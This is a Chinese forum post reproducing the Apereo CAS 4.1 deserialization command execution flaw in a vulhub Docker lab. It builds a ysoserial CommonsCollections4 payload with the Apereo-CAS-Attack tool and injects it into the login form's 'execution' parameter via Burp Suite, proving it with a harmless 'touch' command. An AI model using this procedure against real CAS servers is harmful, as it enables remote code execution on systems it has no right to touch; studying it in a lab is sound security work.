登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
博客
发1篇日志+1圆
记录
发1条记录+2圆币
发帖说明
VIP申请
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
VIP申请
VIP网盘
网盘
联系我们
道具
勋章
任务
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
业界
›
Apereo CAS 4.1 反序列化命令执行漏洞 (复现) ...
Apereo CAS 4.1 反序列化命令执行漏洞 (复现)
[ 复制链接 ]
院儿饯
2025-7-28 18:10:38
此漏洞需要用到工具Apereo-CAS-Attack,工具地址:https://github.com/vulhub/Apereo-CAS-Attack
还需要下载结合https://github.com/frohoff/ysoserial的CommonsCollections4链生成 Payload
上述工具下载完成后将ysoserial放在工具的根目录里
在根目录下打开终端执行以下命令将 jar 包安装到本地 Maven 仓库
点击查看代码
mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file \
-Dfile=ysoserial-all.jar \
-DgroupId=ysoserial \
-DartifactId=ysoserial \
-Dversion=0.0.6 \
-Dpackaging=jar \
-DlocalRepositoryPath=my-repo
复制代码
命令成功执行!!!
ysoserial会被安装到项目根目录的my-repo文件夹中,供 Maven 构建时引用
执行以下命令安装项目所需环境
点击查看代码
# 更新包列表
sudo apt update
# 安装OpenJDK 8
sudo apt install openjdk-8-jdk -y
# 同样配置javac(编译器)
sudo update-alternatives --config javac
# 选择OpenJDK 8对应的javac路径
#执行以下代码
javac -version
若返回类似javac 1.8.0_xxx,说明 JDK 安装成功
复制代码
执行代码mvn clean package assembly:single -DskipTests构建项目
执行成功示图如上,接下来就可以使用该工具生成payload了
漏洞目录终端下执行docker compose up -d开启容器访问ip:8080
生成恶意 Payload
利用漏洞工具Apereo-CAS-Attack(集成了默认密钥和序列化逻辑)生成加密后的恶意序列化数据
java -jar target/apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas_exploit_success"
生成 Payload(利用反序列化执行 touch /tmp/cas_exploit_success)
工具会输出一段 Base64 编码的长字符串;
接下来请出bp(burpsuite)抓包
网站首页使用测试账密test/test,输入后不要登陆!!!
回到bp点击proxy启动代理(浏览器也需要挂上bp的代理),点击登录开始抓包
鼠标右键点击那条POST命令send to repeater,切换到repeater界面
将第一步生成的Base64编码替换成execution参数的内容
点击Send,收到状态码500,不确定漏洞复现没,验证一下
java -jar target/apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas_exploit_success"
此命令是在服务器的/tmp目录下创建文件,只需要访问服务器这个位置查看是否成功创建文件即可验证是否成功
文件创建成功,该漏洞成功复现!!!
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
Apereo
CAS
序列化
命令
执行
相关帖子
Oracle 19C 日常维护命令
Git的使用以及常用命令(详解)
WinGet 在涉及查询应用的命令时,会处于长时间加载,无法进行下一步操作
[RPC/序列化] Proto 文件的语法解读
Linux gzip 命令使用说明
Linux tar 命令使用说明
每天一个安卓测试开发小知识之 (四) ---常用的adb shell命令第二期 pm命令
从JSON到Protobuf,深入序列化方案的选型与原理
每天一个安卓测试开发小知识之 (五)---常用的adb shell命令第三期 pm命令第二期
Python 中多个装饰器执行顺序验证
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
Oracle 19C 日常维护命令
0
707
恿榫
2025-08-12
安全
Git的使用以及常用命令(详解)
0
271
啤愿
2025-08-14
安全
WinGet 在涉及查询应用的命令时,会处于长时间加载,无法进行下一步操作
0
901
吞脚
2025-08-28
业界
[RPC/序列化] Proto 文件的语法解读
0
507
骆贵
2025-08-29
业界
Linux gzip 命令使用说明
0
964
郗燕岚
2025-08-29
安全
Linux tar 命令使用说明
0
1019
庾签
2025-08-30
业界
每天一个安卓测试开发小知识之 (四) ---常用的adb shell命令第二期 pm命令
0
596
杆树
2025-09-02
业界
从JSON到Protobuf,深入序列化方案的选型与原理
0
654
左优扬
2025-09-04
业界
每天一个安卓测试开发小知识之 (五)---常用的adb shell命令第三期 pm命令第二期
0
440
蒙飘
2025-09-04
业界
Python 中多个装饰器执行顺序验证
0
250
接快背
2025-09-06
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
科技
签约作者
程序园优秀签约作者
发帖
院儿饯
2025-7-28 18:10:38
关注
0
粉丝关注
10
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
敖可
9984
黎瑞芝
9990
杭环
9988
4
凶契帽
9988
5
氛疵
9988
6
猷咎
9986
7
里豳朝
9986
8
肿圬后
9986
9
蝓俟佐
9984
10
虽裘侪
9984
查看更多